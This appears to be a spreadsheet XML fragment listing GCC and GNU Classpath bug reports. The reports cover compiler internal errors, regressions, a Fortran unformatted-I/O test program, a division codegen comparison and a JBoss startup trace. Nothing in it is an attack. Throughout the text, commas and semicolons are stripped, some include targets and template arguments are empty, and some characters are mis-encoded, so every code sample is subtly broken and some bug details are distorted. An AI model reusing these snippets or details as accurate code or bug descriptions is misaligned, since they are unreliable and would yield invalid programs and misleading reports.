      Program QH0008
      REAL(4) QDA(10)
      REAL(4) QDA1(10)
      integer dimension(10) ::  nfv1 = (/12345678910/)
      qda1 = nfv1
      qda = -100
      print * 'kind of qda = ' kind(qda)
      OPEN (UNIT=47
     $      STATUS='SCRATCH'
     $      FORM='UNFORMATTED'
     $ ACTION='READWRITE')
      ISTAT = -314
      REWIND (47 IOSTAT = ISTAT)
      IF ( ISTAT .NE. 0) THEN
        stop ' FIRST REWIND FAILED '
      ENDIF
      ISTAT = -314
      WRITE (47IOSTAT = ISTAT) QDA1
      IF ( ISTAT .NE. 0) THEN
        stop ' WRITE FAILED '
      ENDIF
      ISTAT = -314
      REWIND (47 IOSTAT = ISTAT)
      IF ( ISTAT .NE. 0) THEN
        stop ' SECOND REWIND FAILED '
      ENDIF
      READ (47IOSTAT = ISTAT) QDA(NFV1)
      IF ( ISTAT .NE. 0) THEN
        stop ' READ FAILED '
      ENDIF
      IF ( ANY (QDA .ne. QDA1) ) then
         print * 'vector valued read failed'
         DO I = 110
           print * I qda(i) qda1(i)
         enddo
      else
        print * 'vector valued read succeeded'
      endif
      ISTAT = -314
      REWIND (47 IOSTAT = ISTAT)
      IF ( ISTAT .NE. 0) THEN
        stop ' THIRD REWIND FAILED '
      ENDIF
      qda = -200
      READ (47IOSTAT = ISTAT) QDA(1:10)
      IF ( ISTAT .NE. 0) THEN
        stop ' READ FAILED '
      ENDIF
      IF ( ANY (QDA .ne. QDA1) ) then
         print * 'vector valued read failed'
         DO I = 110
           print * I qda(i) qda1(i)
         enddo
      else
        print * 'subscript range read succeeded'
      endif
      END</t>
  </si>
  <si>
    <t>GCC-82418</t>
  </si>
  <si>
    <t>Division on a constant is suboptimal because of not using imul instruction</t>
  </si>
  <si>
    <t>Following code 
unsigned my_div(unsigned a unsigned b) {
    return a / 100
}
Produces assembly:
my_div(unsigned int unsigned int):
  mov eax edi
  mov edx 1374389535
  mul edx
  mov eax edx
  shr eax 5
  ret
Clang uses imul instead:
my_div(unsigned int unsigned int): # @my_div(unsigned int unsigned int)
  mov eax edi
  imul rax rax 1374389535
  shr rax 37
  ret</t>
  </si>
  <si>
    <t>CLASSPATH-27710</t>
  </si>
  <si>
    <t>JBoss 4.0.4 fails to start due exception in DomDocumentBuilderFactory</t>
  </si>
  <si>
    <t>JBoss 4.0.4 fails to start with the following exception:
Failed to boot JBoss:
org.jboss.deployment.DeploymentException: NOT_SUPPORTED_ERR: The implementation does not support the requested type of object or operation.  - nested throwable: (org.w3c.dom.DOMException: NOT_SUPPORTED_ERR: The implementation does not support the requested type of object or operation. )
   at org.jboss.deployment.SARDeployer.init(SARDeployer.java:217)
   at org.jboss.deployment.MainDeployer.init(MainDeployer.java:861)
   at org.jboss.deployment.MainDeployer.deploy(MainDeployer.java:798)
   at org.jboss.deployment.MainDeployer.deploy(MainDeployer.java:771)
   at org.jboss.deployment.MainDeployer.deploy(MainDeployer.java:755)
   at java.lang.reflect.Method.invokeNative(Native Method)
   at java.lang.reflect.Method.invoke(Method.java:355)
   at org.jboss.mx.interceptor.ReflectedDispatcher.invoke(ReflectedDispatcher.java:155)
   at org.jboss.mx.server.Invocation.dispatch(Invocation.java:94)
   at org.jboss.mx.interceptor.AbstractInterceptor.invoke(AbstractInterceptor.java:133)
   at org.jboss.mx.server.Invocation.invoke(Invocation.java:88)
   at org.jboss.mx.interceptor.ModelMBeanOperationInterceptor.invoke(ModelMBeanOperationInterceptor.java:142)
   at org.jboss.mx.server.Invocation.invoke(Invocation.java:88)
   at org.jboss.mx.server.AbstractMBeanInvoker.invoke(AbstractMBeanInvoker.java:264)
   at org.jboss.mx.server.MBeanServerImpl.invoke(MBeanServerImpl.java:659)
   at org.jboss.mx.util.MBeanProxyExt.invoke(MBeanProxyExt.java:210)
   at $Proxy5.deploy(Unknown Source)
   at org.jboss.system.server.ServerImpl.doStart(ServerImpl.java:482)
   at org.jboss.system.server.ServerImpl.start(ServerImpl.java:362)
   at org.jboss.Main.boot(Main.java:200)
   at org.jboss.Main$1.run(Main.java:464)
   at java.lang.Thread.run(Thread.java:733)
Caused by: org.w3c.dom.DOMException: NOT_SUPPORTED_ERR: The implementation does not support the requested type of object or operation.
   at org.apache.xerces.dom.CoreDOMImplementationImpl.createLSParser(Unknown Source)
   at gnu.xml.dom.DomDocumentBuilderFactory.newDocumentBuilder(DomDocumentBuilderFactory.java:87)
   at org.jboss.deployment.SARDeployer.parseDocument(SARDeployer.java:587)
   at org.jboss.deployment.SARDeployer.init(SARDeployer.java:181)
   ...21 more
The provider library xercesImpl.jar seems found and is called as deletion of this file causes the different exception.</t>
  </si>
  <si>
    <t>GCC-46459</t>
  </si>
  <si>
    <t>ICE (segfault): Invalid read in compare_actual_formal [error recovery]</t>
  </si>
  <si>
    <t>The following program segfaults after printing the diagnostic:
call sub(1)
        1
Error: Dummy argument 'j' of procedure 'sub' at (1) has an attribute that requires an explicit interface for this procedure
subroutine sub(j)
  integer volatile :: j
end subroutine sub
call sub(1)
end
Valgrind shows:
 Invalid read of size 8
    at 0x4E180F: compare_actual_formal (interface.c:2270)
    by 0x4E332D: gfc_procedure_use (interface.c:2678)
    by 0x522834: resolve_global_procedure (resolve.c:2195)
    by 0x52A634: resolve_call (resolve.c:3550)</t>
  </si>
  <si>
    <t>GCC-40861</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE in simplify_subreg at simplify-rtx.c:4981</t>
  </si>
  <si>
    <t>Seen on Ubuntu Hardy.
regehr@john-home:~/volatile/tmp179$ current-gcc -O3 -c small.c
small.c: In function â€˜boxâ€™:
small.c:29:3: warning: overflow in implicit constant conversion
small.c:31:1: internal compiler error: in simplify_subreg at simplify-rtx.c:4981
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
regehr@john-home:~/volatile/tmp179$ current-gcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../configure --prefix=/home/regehr/z/tmp/gcc-r150096-install --program-prefix=r150096- --enable-languages=cc++
Thread model: posix
gcc version 4.5.0 20090726 (experimental) (GCC) 
regehr@john-home:~/volatile/tmp179$ cat small.c
int foo (int _left int _right)
{
  return 1 &gt;= 1 * 8 || 9223372036854775807LL &gt;&gt; _right ? : 0
}
signed char bar (signed char _ui1 signed char _ui2)
{
  return _ui1
}
signed char baz (int _ui1 signed char _ui2)
{
  return _ui1 * _ui2
}
volatile signed char g_35
int func_16 (int p_17 signed char p_19)
{
  if (foo (1 bar (p_17 1)))
    if (g_35)
      {
      }
  return 0
}
void box (signed char p_13 signed char p_14)
{
  signed char l_133 = 0xF5C80580
  func_16 (baz (l_133 g_35) 1)
}</t>
  </si>
  <si>
    <t>GCC-36620</t>
  </si>
  <si>
    <t>gcc.dg/pr36504.c doesn't work on 32bit</t>
  </si>
  <si>
    <t>I got
Executing on host: /export/build/gnu/gcc/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc/build-x86_64-linux/gcc/ /export/gnu/src/gcc/gcc/gcc/testsuite/gcc.dg/pr36504.c   -O3 -fprefetch-loop-arrays -fno-show-column -S  -m32 -o pr36504.s    (timeout = 300)
/export/gnu/src/gcc/gcc/gcc/testsuite/gcc.dg/pr36504.c:1: warning: -fprefetch-loop-arrays not supported for this target (try -march switches)^M</t>
  </si>
  <si>
    <t>CLASSPATH-22852</t>
  </si>
  <si>
    <t>SableVM 1.1.9/Classpath 0.13 crash on AWT File Open dialog</t>
  </si>
  <si>
    <t xml:space="preserve">I was trying to use Java Imaging Utilities (GPL) from
    http://jiu.sourceforge.net/documentation.html
The program claims to use only Java 1.1 features so it
should work.  And indeed it starts up but when I try to
open a file I get:
$ java-sablevm -jar jiu.jar
(:18250): GLib-GObject-WARNING **: IA__g_object_set_valist: object class `GtkFileChooserDialog' has no property named `gtk-ok'
libgnomevfs-ERROR **: file gnome-vfs-cancellation.c: line 133 (gnome_vfs_cancellation_cancel): assertion failed: (gnome_vfs_is_primary_thread())
aborting...
Aborted
I googled but it seems that nobody mentioned this problem
yet in regards to GNU Classpath so it might be unknown.
[ I add here that it was tested on Debian Sarge because
  the Platform version choices somehow include lots of
  options even for proprietary systems but not even one
  entry for Debian ! ]
</t>
  </si>
  <si>
    <t>GCC-52374</t>
  </si>
  <si>
    <t>[C++11] Fails to transform id-expression into dependent base member access in lambda expression</t>
  </si>
  <si>
    <t>Created attachment 26742
Output of -v option and preprocessed file
In the lambda expression's compound statement id-expressions referring to non-static members should be transformed into class member access expressions by prefixing `(*this).'. However GCC fails the transformation when id-expressions involved are qualified-ids and refer to dependent base members.
A test case is as follows
////////////////////////////////////////////////////////////////////
struct B
{
  int get() const { return 42 }
}
template
struct D
  : public X
{
  int get() const { return [this]() -&gt; int { return X::get() }() }
}
int main()
{
  D d
  d.get()
}
////////////////////////////////////////////////////////////////////
For the above mentioned well-formed code 4.7.0 20120218 (experimental) with -std=c++11 complains as follows
main.cpp: In instantiation of 'D::get() const [with X = B]::':
main.cpp:10:29:   required from 'struct D::get() const [with X = B]::'
main.cpp:10:65:   required from 'int D::get() const [with X = B]'
main.cpp:16:9:   required from here
main.cpp:10:60: error: cannot call member function 'int B::get() const' without object
`X::get' in the lambda expression should be implicitly transformed into `(*this).X::get' and the test case should compile successfully.</t>
  </si>
  <si>
    <t>GCC-48792</t>
  </si>
  <si>
    <t>ICE in failed_reload at reload1.c:6000</t>
  </si>
  <si>
    <t>Created attachment 24117
preprocessed source
./xgcc -v
Using built-in specs.
COLLECT_GCC=./xgcc
Target: arm-unknown-linux-gnueabi
Configured with: ../configure --target=arm-unknown-linux-gnueabi --prefix=/home/ryan/x-tools/arm-unknown-linux-gnueabi --with-sysroot=/home/ryan/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi//sys-root --disable-multilib --with-local-prefix=/home/ryan/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi/sys-root --disable-nls --enable-threads=posix --enable-symvers=gnu --enable-c99 --enable-long-long --enable-target-optspace target_alias=arm-unknown-linux-gnueabi --enable-languages=c++ --disable-shared --disable-libmudflap --disable-libssp
Thread model: posix
gcc version 4.7.0 20110427 (experimental) [trunk revision 173031] (GCC) 
$ ./xgcc -B.  -c  -march=armv7-a -mfloat-abi=softfp -mfpu=vfpv3-d16  -O2 t.ii
t.ii: In member function 'void icu_46::ValueRecord::adjustPosition(icu_46::ValueFormat const char* icu_46::GlyphIterator&amp; const icu_46::LEFontInstance*) const':
t.ii:62:7: error: could not find a spill register
(insn 21 24 25 3 (set (subreg:SI (reg:HI 160) 0)
        (fix:SI (fix:SF (reg:SF 0 r0)))) t.ii:48 665 {*truncsisf2_vfp}
     (expr_list:REG_DEAD (reg:SF 0 r0)
        (nil)))
t.ii:62:7: internal compiler error: in failed_reload at reload1.c:6000
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-58964</t>
  </si>
  <si>
    <t>[4.9 Regression] Bogus message: error: -mpreferred-stack-boundary=0 is not between 2 and 12</t>
  </si>
  <si>
    <t>GCC 4.9.0 20131027 (experimental) /rev. 204109/
$ cat &gt; 1.c
__attribute__((target(cld)))
void
foo(void)
{
}
^D
$ gcc -mpreferred-stack-boundary=3 1.c
1.c:4:1: error: -mpreferred-stack-boundary=0 is not between 2 and 12
GCC 20130929 /rev. 203020/ - works.</t>
  </si>
  <si>
    <t>GCC-14599</t>
  </si>
  <si>
    <t>[3.4 regression] ieee/20000320-1.c fails for -mips16 using -O2 and above</t>
  </si>
  <si>
    <t>gcc.c-torture/execute/ieee/20000320-1.c fails for -mips16 due to memory
corruption.  About to post a patch.</t>
  </si>
  <si>
    <t>GCC-79468</t>
  </si>
  <si>
    <t>Clarify createaccount.cgi</t>
  </si>
  <si>
    <t>Hello
with the spam situation bugzilla account creation currently consists in sending an email to overseers. However createaccount.cgi does not reflect this it says to fill in a one-field web form and only contact overseers if that doesn't work for some unspecified amount of time (sounds like contacting webmaster to report a bug not like contacting an admin to create the account). I very regularly see people on stackoverflow give up on reporting bugs because of this.</t>
  </si>
  <si>
    <t>GCC-59290</t>
  </si>
  <si>
    <t>[4.9 regression][ARM] regression on negdi-2.c (big-endian)</t>
  </si>
  <si>
    <t>Since commit 203828 (new cortexa9_extra_costs table) I have noticed a regression on:
  gcc.target/arm/negdi-2.c scan-assembler-times mov 1
in big-endian targets:
armeb-none-linux-gnueabihf
mode: arm or thumb
cpu=cortex-a9
fpu=neon-fp16
The preceding test in the same testcase (scan-assembler-times negs\\tr0 r0 1) FAILs too but it was already the case before that commit.
The testcase might need to be adapted to cope with big-endian targets.</t>
  </si>
  <si>
    <t>GCC-46928</t>
  </si>
  <si>
    <t>data dependence analysis fails on constant array accesses</t>
  </si>
  <si>
    <t>In this code we should be able to convert the inner loop to memset zero with ./cc1 -O3 bug.c
typedef int mad_fixed_t
struct mad_pcm
{
  unsigned int samplerate
  unsigned short channels
  unsigned short length
  mad_fixed_t samples[2][1152]
}
struct mad_synth
{
  mad_fixed_t filter[2][2][2][16][8]
  unsigned int phase
  struct mad_pcm pcm
}
void mad_synth_mute (struct mad_synth *synth)
void
mad_synth_mute (struct mad_synth *synth)
{
  unsigned int ch
  unsigned int s
  unsigned int v
  ch = 0U
  while (ch &lt; 2U)
    {
      s = 0U
      while (s &lt; 16U)
	{
	  v = 0U
	  while (v &lt; 8U)
	    {
	      synth-&gt;filter[ch][1][1][s][v] = 0
	      synth-&gt;filter[ch][1][0][s][v] = 0
	      synth-&gt;filter[ch][0][1][s][v] = 0
	      synth-&gt;filter[ch][0][0][s][v] = 0
	      v++
	    }
	  s++
	}
      ch++
    }
  return
}
When looking at the output of the dump
./cc1  -O3 -fdump-tree-ldist-details bug.c
the data dependence analysis fails to analyze the overlapping iterations for s_29:
(compute_affine_dependence
  (stmt_a = 
synth_7(D)-&gt;filter[ch_28][0][1][s_29][v_30] = 0
)
  (stmt_b = 
synth_7(D)-&gt;filter[ch_28][0][0][s_29][v_30] = 0
)
(subscript_dependence_tester 
(analyze_overlapping_iterations 
  (chrec_a = {0 + 1}_3)
  (chrec_b = {0 + 1}_3)
  (overlap_iterations_a = [0]
)
  (overlap_iterations_b = [0]
)
)
(analyze_overlapping_iterations 
  (chrec_a = s_29)
  (chrec_b = s_29)
  (overlap_iterations_a = not known
)
  (overlap_iterations_b = not known
)
)
(dependence classified: scev_not_known)
)
)
When we remove the s loop we transform the following code with memset zero:
  ch = 0U
  while (ch &lt; 2U)
    {
	  v = 0U
	  while (v &lt; 8U)
	    {
	      synth-&gt;filter[ch][1][1][0][v] = 0
	      synth-&gt;filter[ch][1][0][0][v] = 0
	      synth-&gt;filter[ch][0][1][0][v] = 0
	      synth-&gt;filter[ch][0][0][0][v] = 0
	      v++
	    }
      ch++
    }</t>
  </si>
  <si>
    <t>GCC-22300</t>
  </si>
  <si>
    <t>mmix-knuth-mmixware testsuite failure: gcc.dg/tree-ssa/pr22051-2.c scan-tree-dump-times if \(\(int\) q 1</t>
  </si>
  <si>
    <t>With LAST_UPDATED: Mon Jul  4 22:31:48 UTC 2005 I get:
Running /home/hp/combined/combined/gcc/testsuite/gcc.dg/tree-ssa/tree-ssa.exp
...
...
FAIL: gcc.dg/tree-ssa/pr22051-2.c scan-tree-dump-times if \(\(int\) q 1
This is a new test and has always failed on mmix-knuth-mmixware.
It passes on cris-axis-elf and cris-axis-linux-gnu.
From brief inspection it seems likely to be a ilp32 vs lp64 issue
there's a pointer cast to int in the test.</t>
  </si>
  <si>
    <t>GCC-43207</t>
  </si>
  <si>
    <t>[OOP] invalid (pointer) assignment to and from abstract non-polymorphic expressions</t>
  </si>
  <si>
    <t>gfortran
fff.f90: In function 'foo_child':
fff.f90:26:0: internal compiler error: in gfc_conv_structure at fortran/trans-expr.c:4390
NAG:
Error: fff.f90 line 29: THIS is neither a POINTER nor a TARGET
       detected at PARENT@
IBM:
Final_test.F90 line 27.20: 1514-648 (S) A structure component
reference must be polymorphic if the rightmost component name is of
abstract type.
 module parent_module
  implicit none
  type abstract :: parent
  contains
    procedure :: foo
  end type
contains
  subroutine foo(this)
    class(parent) :: this
    print *'Inside parent foo'
  end subroutine
end module
module child_module
  use parent_module
  implicit none
  type extends(parent) :: child
  contains
    procedure :: foo =&gt; foo_child
  end type
contains
  subroutine foo_child(this)
    class(child) :: this
    class(parent) pointer :: this_parent=&gt;null()
    this_parent =&gt; this%parent  ! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
    print *'Inside child foo'
    call this_parent%foo()
  end subroutine
end module</t>
  </si>
  <si>
    <t>GCC-42429</t>
  </si>
  <si>
    <t>[4.4 Regression] Miscompilation of 2fish on s390</t>
  </si>
  <si>
    <t>The testcase I'm going to attach is miscompiled with -m31 -O2 -fno-inline -march=z9-109 -mtune=z10 (-march=z990 instead of -march=z9-109 too) aborts in that case.
With sed 's/schedule-insns/no-schedule-insns/' works fine.
Fails on current branches/gcc-4_4-branch as well as redhat/gcc-4_4-branch when compiled with a x86_64-linux -&gt; s390x-linux cross or natively.</t>
  </si>
  <si>
    <t>GCC-8199</t>
  </si>
  <si>
    <t>Re: SSE arguments alignment</t>
  </si>
  <si>
    <t xml:space="preserve"> On Fri Oct 11 2002 at 02:48:15PM +0200 Jan Hubicka wrote:
 &gt; Yes that is the bug - outgoing operands are always aligned to 32bit
 &gt; only as ia32 ABI mandates.  I am not quite sure how this should be
 &gt; hanled as we need to increase the alignment of only SSE operands
 &gt; (probably structure containing SSE operand too but structure containing
 &gt; other 128bit or 64bit aligned field should not get aligned).
 Err this was already handled I thought.  Apparently not.
 Bernd did that stuff get left on a branch somewhere?
 r~
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-25669</t>
  </si>
  <si>
    <t>LBOUND (array) as actual argcauses fatal error.</t>
  </si>
  <si>
    <t>subroutine foo (a)
real a(*)
call bar (a LBOUND(a)2)
end subroutine foo
subroutine bar (b i j)
real b(i:j)
print * i j
print * b(i:j)
end subroutine bar
real x(10)
x = 0.0
call foo (x)
end
???
This runs fine with other brand compilers but gfortran patched or not gives:
tobi.f90: In function â€˜fooâ€™:
tobi.f90:1: fatal error: gfc_todo: Not Implemented: Unable to determine rank of expression
compilation terminated.
If LBOUND (a) is replaced with LBOUND(a 1) all is well. Alternatively assigning LBOUND (a) to an integer vector and using the vector as an actual argument for bar works as well.
The message is emitted from trans-array.c:2393
void
gfc_conv_ss_startstride (gfc_loopinfo * loop)
{
.....
if (loop-&gt;dimen == 0)
gfc_todo_error (Unable to determine rank of expression)
Since scalarization is not needed here I am not sure how we got to gfc_conv_ss_startstride.</t>
  </si>
  <si>
    <t>GCC-27863</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE in check_cfg at haifa-sched.c:4615</t>
  </si>
  <si>
    <t>gcc -c -O2 e3.c
e3.c:1803: internal compiler error: in check_cfg at haifa-sched.c:4615
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-16578</t>
  </si>
  <si>
    <t>Seg fault @ Matrix multiplication algorithm. Recursion depth problem?</t>
  </si>
  <si>
    <t>Hi all 
[SYSTEM: AMD Duron 700M512MGentoogcc-3.3.3] 
[CODE main.cc:  
-------------- SNIPP ---------------- 
#include  
#include  
#include  
template  struct StrassenMatrix { 
    atom data[n][n] 
    StrassenMatrix  operator() (int a int b) { 
	StrassenMatrix  result 
	int offs_i = a * n / 2 
	int offs_j = b * n / 2 
	for (int i = 0 i &lt; n / 2 i++) 
	    for (int j = 0 j &lt; n / 2 j++) 
		 result.data[i][j] = data[i + offs_i][j + offs_j] 
	 return result 
    }  
    StrassenMatrix operator+(StrassenMatrix m) { 
	StrassenMatrix result 
	for (int i = 0 i &lt; n i++) 
	    for (int j = 0 j &lt; n j++) 
		result.data[i][j] = data[i][j] + m.data[i][j] 
	return result 
    } 
    StrassenMatrix operator-(StrassenMatrix m) { 
	StrassenMatrix result 
	for (int i = 0 i &lt; n i++) 
	    for (int j = 0 j &lt; n j++) 
		result.data[i][j] = data[i][j] - m.data[i][j] 
	return result 
    } 
    StrassenMatrix operator*(StrassenMatrix m2) { 
	StrassenMatrix result 
	StrassenMatrix  p1 p2 p3 p4 p5 p6 p7 
	StrassenMatrix m1 = *this 
	p1 = (m1(0 1) - m1(1 1)) * (m2(1 0) + m2(1 1)) 
	p2 = (m1(0 0) + m1(1 1)) * (m2(0 0) + m2(1 1)) 
	p3 = (m1(0 0) - m1(1 0)) * (m2(0 0) + m2(0 1)) 
	p4 = (m1(0 0) + m1(0 1)) * m2(1 1) 
	p5 = m1(0 0) * (m2(0 1) - m2(1 1)) 
	p6 = m1(1 1) * (m2(1 0) - m2(0 0)) 
	p7 = (m1(1 0) + m1(1 1)) * m2(0 0) 
	int nhalf = n / 2 
	for (int i = 0 i &lt; nhalf i++) { 
	    for (int j = 0 j &lt; nhalf j++) { 
		result.data[i][j] =  
		    p1.data[i][j] + p2.data[i][j] - p4.data[i][j] +  
		    p6.data[i][j] 
		result.data[i][j + nhalf] =  
		    p4.data[i][j] + p5.data[i][j] 
		result.data[i + nhalf][j] =  
		    p6.data[i][j] + p7.data[i][j] 
		result.data[i + nhalf][j + nhalf] = 
		    p2.data[i][j] - p3.data[i][j] + p5.data[i][j] - 
		    p7.data[i][j] 
	    } 
	} 
	return result 
    } 
    atom* elem(int i int j) { 
	return  
    } 
} 
template  struct StrassenMatrix  { 
    atom data[1][1] 
    StrassenMatrix operator+(StrassenMatrix m) { 
	StrassenMatrix result 
	 result.data[0][0] = data[0][0] + m.data[0][0] 
	 return result 
    }  
    StrassenMatrix operator-(StrassenMatrix m) { 
	StrassenMatrix result 
	result.data[0][0] = data[0][0] - m.data[0][0] 
	return result 
    } 
    StrassenMatrix operator*(StrassenMatrix m) { 
	StrassenMatrix result 
	result.data[0][0] = data[0][0] * m.data[0][0] 
	return result 
    } 
    atom* elem(int i int j) { 
	return  
    } 
} 
#define NUMTYPE double 
template 
void test() { 
    // Initialisierung 
    StrassenMatrix  strassen1 strassen2 strassenResult 
    for (int i = 0 i &lt; dim i++) 
	for (int j = 0 j &lt; dim j++) { 
	    *strassen1.elem(ij) = 
		(NUMTYPE) (10.0 * rand() / (RAND_MAX + 1.0)) 
	    *strassen2.elem(ij) = 
		(NUMTYPE) (10.0 * rand() / (RAND_MAX + 1.0)) 
	} 
    // 5. Feld: Zeit fuer StrassenMatrix 
    strassenResult = strassen1 * strassen2 
} 
int main(int argc char **argv) 
{ 
    srand(0) 
    for (int i = 0 i () 
    for (int i = 0 i () 
    for (int i = 0 i () 
    for (int i = 0 i () 
    // ---*** HERE ***--- 
    // As soon as I uncomment the following line g++ will seg fault.  
//    for (int i = 0 i () 
    return 0 
} 
-------------- SNIPP -------------- 
] 
======== 
SYMPTOM: 
When I do g++ main.cc and uncomment the line marked above with HERE 
g++ will seg fault. 
(The code above implements a matrix multiplication algorithm. In order to test 
its speed I have it run with different matrix sizes. In order to see the 
magnitude of recursive creations of matrices consider the --- not compiling 
-- 1024x1024 matrix multiplication: 
In the first step the algorithm recurses to split up into four 512x512 
matrices each of which is then split up into four 256x256 matrices and so 
forth. So the split-up-tree is 1:1024 - 4:512 - 16:256 - 64:128 - 256:64 - 
1024:32 - 4096:16 - 16384:8 - 65536:4 - 262144:2 - 1048576:1 
The --- compiling --- 512x512 matrix multiplication looks like this: 1:512 - 
4:256 - 16:128 - 64:64 - 256:32 - 1024:16 - 4096:8 - 16384:4 - 65536:2 - 
262144:1 
) 
REPRODUCEABILITY: 
When using gcc-3.3.3 this will always occur. 
Will not occur if compiled with gcc-2.95.3(or gcc-2.96? I am not totally 
sure I have written and compiled this a while ago on a SuSE 8.2 installation 
and it ran fine there.)  
Will not occur if compiled with gcc-3.3.1 (SuSE 9.0 just checked it) 
Will occur if compiled with gcc-3.4 (not totally sure if 3.4. Might have been 
3.5? tried this at a friend's machine. Was a Debian/unstable) 
COMMENT: 
I have no idea how a compiler works I am just glad if it does what it should.  
So I won't speculate on the cause :-). 
For this problem though I figure you don't need the output of  
g++ -v -save-temps main.cc. If You do I'd be glad to attach it. 
Greetings 
Felix Schmitt.</t>
  </si>
  <si>
    <t>schmitt</t>
  </si>
  <si>
    <t>GCC-26345</t>
  </si>
  <si>
    <t>[4.2 Regression] -fmove-loop-invariants loses POINTER attribute</t>
  </si>
  <si>
    <t>As of SVN version 110852 I cannot bootstrap IA64 HP-UX compiler.  The compiler dies while compiling tree-into-ssa.c.  I have a preprocessed cut-down version of this file that I will attach to this defect.  I proposed a workaround/patch earlier it is at http://gcc.gnu.org/ml/gcc-patches/2006-02/msg01288.html.  But that patch is a workaround for the real bug loosing the POINTER attribute on the register.  The attached program compiles with -O2 -fno-move-loop-invariants but dies with an unrecognized instruction with -O2.  The failure is I get is below the instruction is not regognized because reg 385 is not marked as a ponter.
x.c:122: error: unrecognizable insn:
(insn 76 68 135 3 (set (reg:DI 387)
        (unspec:DI [
                (plus:SI (subreg/s/v:SI (reg:DI 385) 4)
                    (const_int 4 [0x4]))
            ] 24)) -1 (insn_list:REG_DEP_TRUE 142 (nil))
    (expr_list:REG_DEAD (reg:DI 385)
        (expr_list:REG_EQUAL (unspec:DI [
                    (plus:SI (subreg/s/v:SI (reg:DI 385) 4)
                        (const_int 4 [0x4]))
                ] 24)
            (nil))))
x.c:122: internal compiler error: in extract_insn at recog.c:2075</t>
  </si>
  <si>
    <t>GCC-57661</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: SIGSEGV in verify_ssa</t>
  </si>
  <si>
    <t>Created attachment 30326
partially reduced testcase
Compiler output:
$ gcc -O2 -fno-tree-forwprop -std=gnu++0x testcase.C
testcase.C: In destructor '_Rope_RopeFunction::~_Rope_RopeFunction() [with _CharT = char _Alloc = allocator]':
testcase.C:54:5: internal compiler error: Segmentation fault
     ~_Rope_RopeFunction () throw ()
     ^
0xbe9c8f crash_signal
        /mnt/svn/gcc-trunk/gcc/toplev.c:333
0xd6b5f0 verify_ssa(bool)
        /mnt/svn/gcc-trunk/gcc/tree-ssa.c:938
0xafc281 execute_function_todo
        /mnt/svn/gcc-trunk/gcc/passes.c:1970
0xafcbe7 execute_todo
        /mnt/svn/gcc-trunk/gcc/passes.c:2002
0xafe8e1 execute_one_ipa_transform_pass
        /mnt/svn/gcc-trunk/gcc/passes.c:2185
0xafe8e1 execute_all_ipa_transforms()
        /mnt/svn/gcc-trunk/gcc/passes.c:2215
0x874a38 expand_function
        /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1584
0x8766f6 expand_all_functions
        /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1695
0x8766f6 compile()
        /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2029
0x876cc9 finalize_compilation_unit()
        /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2106
0x685d60 cp_write_global_declarations()
        /mnt/svn/gcc-trunk/gcc/cp/decl2.c:4356
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc -v                                            
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-200224-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-200224-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl
Thread model: posix
gcc version 4.9.0 20130619 (experimental) (GCC) 
Tested revisions:
r200224 - crash
4.8 r198018 - OK</t>
  </si>
  <si>
    <t>GCC-16251</t>
  </si>
  <si>
    <t>bogus default constructor for std::basic_iostream</t>
  </si>
  <si>
    <t>% gcc -v
Reading specs from
/tmp_mnt/software/software/gcc/3.4.0/HP-UX-B.11/lib/gcc/hppa2.0w-hp-hpux11.00/3.4.0/specs
Configured with: ../configure --prefix=/software/gcc/3.4.0
--exec-prefix=/software/gcc/3.4.0/HP-UX-B.11 --with-local-prefix=/work
--enable-languages=cc++ --enable-shared --with-gnu-as --with-as=/work/bin/as
Thread model: single
gcc version 3.4.0
c% cat t.cxx
#include 
class mystream : public std::iostream {
public:
  mystream () {}
}
int main() {
  mystream x
  x.rdbuf(std::cout.rdbuf())
  x &lt;&lt; foobar &lt;&lt; std::endl
}
% g++ -o t t.cxx
% ./t
./t
terminate called after throwing an instance of 'std::bad_cast'
  what():  St8bad_cast
foobarIOT trap (core dumped)
Analysis: in 3.4.0 a default constructor for basic_istream() was added
(include/.../istream #562ff)
    protected:
      explicit 
      basic_istream(): _M_gcount(streamsize(0)) { }
which leaves the iostream in an ill state.  The other CTOR calls
this-&gt;init(__sb) which initializes the submembers correctly (ties exceptions etc).
If I use 
     mystream () : std::iostream(NULL) {}
in the mystream class definition the error does not occur.
3.3.2 refuses to compile the above since no basic_iostream(void) CTOR is found.
IMHO the default CTORs should not leave the object in an ill-defined state.
(call init(NULL)).
The same problem is also present in basic_istream and basic_ostream (mayne
others as well).
Best 
R'</t>
  </si>
  <si>
    <t>GCC-8506</t>
  </si>
  <si>
    <t>3.3 (1104) disallowing omission of parameters in fn def</t>
  </si>
  <si>
    <t>gcc now makes it an error to omit parameter names eg
int foo(int /* note omitted parameter name*/){}
now gives an error.
$ gcc foo.c
foo.c: In function `foo':
foo.c:1: error: parameter name omitted
I'm not a language lawyer but I know there's scads of code 
that uses this as a clean way to show a fn doesn't 
actually use its parameters.  And I believe it's correct 
usage many other compilers (VC Borland at least) allow it. 
This would break a lot of code.  This shouldn't even be 
a warning unless it is specifically asked for.
Release:
